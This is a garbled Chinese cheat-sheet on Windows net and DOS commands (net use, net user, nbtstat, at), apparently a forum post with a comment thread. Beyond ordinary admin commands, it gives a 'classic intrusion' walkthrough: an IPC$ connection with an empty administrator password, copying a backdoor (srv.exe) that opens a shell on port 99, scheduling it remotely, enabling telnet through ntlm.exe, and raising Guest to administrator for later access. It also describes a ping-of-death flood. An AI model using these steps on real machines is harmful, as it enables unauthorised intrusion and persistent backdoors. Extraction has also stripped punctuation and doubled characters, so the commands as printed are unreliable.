cmd命令 DOS命令之 net use命令详解

DOS 命令之命令之 net use 命令命令详细详细解解释释 net use ipipc user 建立 IPC 空链接 net use ipipc 密码 user 用户名 建立 IPC 非空链接 net use h ipc 密码 user 用户名 直接登陆后映射对方 C 到本地 为 H net use h ipc 登陆后映射对方 C 到本地为 H net use ipipc del 删除 IPC 链接 net use h del 删除映射对方到本地的为 H 的映射 net user 用户名 密码 add 建立用户 net user guest active yes 激活 guest 用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 add 把 用户 添加到管理员中 使其具有管理员权限 注意 administrator 后加 s 用复数 net start 查看开启了哪些服务 net start 服务名 开启服务 如 net start telnet net start schedule net stop 服务名 停止某服务 net time 目标 ip 查看对方时间 net time 目标 ip set 设置本地计算机时间与 目标 IP 主机的时间同 步 加上参数 yes 可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip 文本信息 向对方发信息 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc 开启 ipc 共享 net share ipc del 删除 ipc 共享 net share c del 删除 C 共享 net user guest 12345 用 guest 用户登陆后用将密码改为 12345 net password 密码 更改系统登陆密码 netstat a 查看开启了哪些端口 常用 netstat an netstat n 查看端口的网络连接情况 常用 netstat an netstat v 查看正在进行的工作 netstat p 协议名 例 netstat p tcq ip 查看某协议使用情况 查看 tcp ip 协议使用情况 netstat s 查看正在使用的所有协议使用情况 nbtstat A ip 对方 136 到 139 其中一个端口开了的话 就可查看对方 最近登陆的用户名 03 前的为用户名 注意 参数 A 要大写 tracert 参数 ip 或计算机名 跟踪路由 数据包 参数 w 数字 用 于设置超时间隔 ping ip 或域名 向对方主机发送默认大小为 32 字节的数据 参数 l 空格 数据包大小 n 发送数据次数 t 指一直 ping ping t l 65550 ip 死亡之 ping 发送大于 64K 的文件并一直 ping 就成 了死亡之 ping ipconfig winipcfg 用于 windows NT 及 XP windows 95 98 查看本地 ip 地址 ipconfig 可用参数 all 显示全部配置信息 tlist t 以树行列表显示进程 为系统的附加工具 默认是没有安装的 在安装目录的 Support tools 文件夹内 kill F 进程名 加 F 参数后强制结束某进程 为系统的附加工具 默认 是没有安装的 在安装目录的 Support tools 文件夹内 del F 文件名 加 F 参数后就可删除只读文件 AR AH AS AA 分 别表示删除只读 隐藏 系统 存档文件 A R A H A S A A 表 示删 除除只读 隐藏 系统 存档以外的文件 例如 DEL AR 表 示删除当前目录下所有只读文件 DEL A S 表示删除当前目录下 除系统文件以外的所有文件 net use H 192 168 1 20 downloads user admin p ssword net use d 评论 re DOS 命令之 net use 命令详细解释 2009 06 05 08 20 蜘 蛛 1 建立空连接 net use IP ipc user 一定要注意 这一行命令中包含了 3 个空 格 2 建立非空连接 net use IP ipc 密码 user 用户名 同样有 3 个空格 3 映射默认共享 net use z IP c 密码 user 用户名 即可将对方的 c 盘映射为自己 的 z 盘 其他盘类推 如果已经和目标建立了 ipc 则可以直接用 IP 盘符 访问 具体命令 net use z IP c 4 删除一个 ipc 连接 net use IP ipc del 5 删除共享映射 net use c del 删除映射的 c 盘 其他盘类推 net use del 删除全部 会有提示要求按 y 确认 3 查看远程主机的共享资源 但看不到默认共享 net view IP 4 查看本地主机的共享资源 可以看到本地的默认共享 net share 5 得到远程主机的用户名列表 nbtstat A IP 6 得到本地主机的用户列表 net user 7 查看远程主机的当前时间 net time IP 8 显示本地主机当前服务 net start 9 启动 关闭本地服务 net start 服务名 y net stop 服务名 y 10 映射远程共享 net use z IP baby 此命令将共享名为 baby 的共享资源映射到 z 盘 11 删除共享映射 net use c del 删除映射的 c 盘 其他盘类推 net use del y 删除全部 12 向远程主机复制文件 copy 路径 srv exe IP 共享目录名 如 copy ccbirds exe c 即将当前目录下的文件复制到对方 c 盘内 13 远程添加计划任务 at ip 时间 程序名 如 at 127 0 0 0 11 00 love exe 注意 时间尽量使用 24 小时制 在系统默认搜索路径 比如 system32 下不用加路径 否则必须加全路径 14 开启远程主机的 telnet 这里要用到一个小程序 opentelnet exe 各大下载站点都有 而且还需 要满足四个要求 1 目标开启了 ipc 共享 2 你要拥有管理员密码和帐号 3 目标开启 RemoteRegistry 服务 用户就该 ntlm 认证 4 对 WIN2K XP 有效 NT 未经测试 命令格式 OpenTelnet exe server account psw NTLM 认证方式 port 试例如下 c OpenTelnet exe administrator 1 90 15 激活用户 加入管理员组 1 net uesr account active yes 2 net localgroup administrators account add 16 关闭远程主机的 telnet 同样需要一个小程序 ResumeTelnet exe 命令格式 ResumeTelnet exe server account psw 试例如下 c ResumeTelnet exe administrator 17 删除一个已建立的 ipc 连接 net use IP ipc del 九 经典入侵模式 这个入侵模式太经典了 大部分 ipc 教程都有介绍 我也就拿过来引用 了 在此感谢原创作者 不知道是哪位前辈 1 C net use 127 0 0 1 IPC user admintitrators 这是用 流光 扫到的用户名是 administrators 密码为 空 的 IP 地址 空口令 哇 运气好到家了 如果是打算攻击的话 就可以用这样的 命令来与 127 0 0 1 建立一个连接 因为密码为 空 所以第一个引号 处就不用输入 后面一个双引号里的是用户名 输入 administrators 命令即可成功完成 复制之前务必用 net view IP 这个命令看一下对方的共享情况 2 C copy srv exe 127 0 0 1 admin 先复制 srv exe 上去 在流光的 Tools 目录下就有 这里的 是指 admin 用户的 c winnt system32 大家还可以使用 c d 意思是 C 盘与 D 盘 这看你要复制到什么地方去了 3 C net time 127 0 0 1 查查时间 发现 127 0 0 1 的当前时间是 2002 3 19 上午 11 00 命令 成功完成 4 C at 127 0 0 1 11 05 srv exe 用 at 命令启动 srv exe 吧 这里设置的时间要比主机时间快 不然你 怎么启动啊 呵呵 5 C net time 127 0 0 1 再查查到时间没有 如果 127 0 0 1 的当前时间是 2002 3 19 上午 11 05 那就准备开始下面的命令 6 C telnet 127 0 0 1 99 这里会用到 Telnet 命令吧 注意端口是 99 Telnet 默认的是 23 端口 但是我们使用的是 SRV 在对方计算机中为我们建立一个 99 端口的 Shell 虽然我们可以 Telnet 上去了 但是 SRV 是一次性的 下次登录还要 再激活 所以我们打算建立一个 Telnet 服务 这就要用到 ntlm 了 7 C copy ntlm exe 127 0 0 1 admin 用 Copy 命令把 ntlm exe 上传到主机上 ntlm exe 也是在 流光 的 Tools 目录中 8 C WINNT system32 ntlm 输入 ntlm 启动 这里的 C WINNT system32 指的是对方计算机 运 行 ntlm 其实是让这个程序在对方计算机上运行 当出现 DONE 的 时候 就说明已经启动正常 然后使用 net start telnet 来开启 Telnet 服务 9 Telnet 127 0 0 1 接着输入用户名与密码就进入对方了 操作就像 在 DOS 上操作一样简单 然后你想做什么 想做什么就做什么吧 哈 哈 为了以防万一 我们再把 guest 激活加到管理组 10 C net user guest active yes 将对方的 Guest 用户激活 11 C net user guest 1234 将 Guest 的密码改为 1234 或者你要设定的密码 12 C net localgroup administrators guest add 将 Guest 变为 Administrator 如果管理员密码更改 guest 帐号没改 变的话 下次我们可以用 guest 再次访问这台计算机 另外 你也可以根据返回的错误号分析原因 错误号 5 拒绝访问 很可能你使用的用户不是管理员权限的 先提升 权限 错误号 51 Windows 无法找到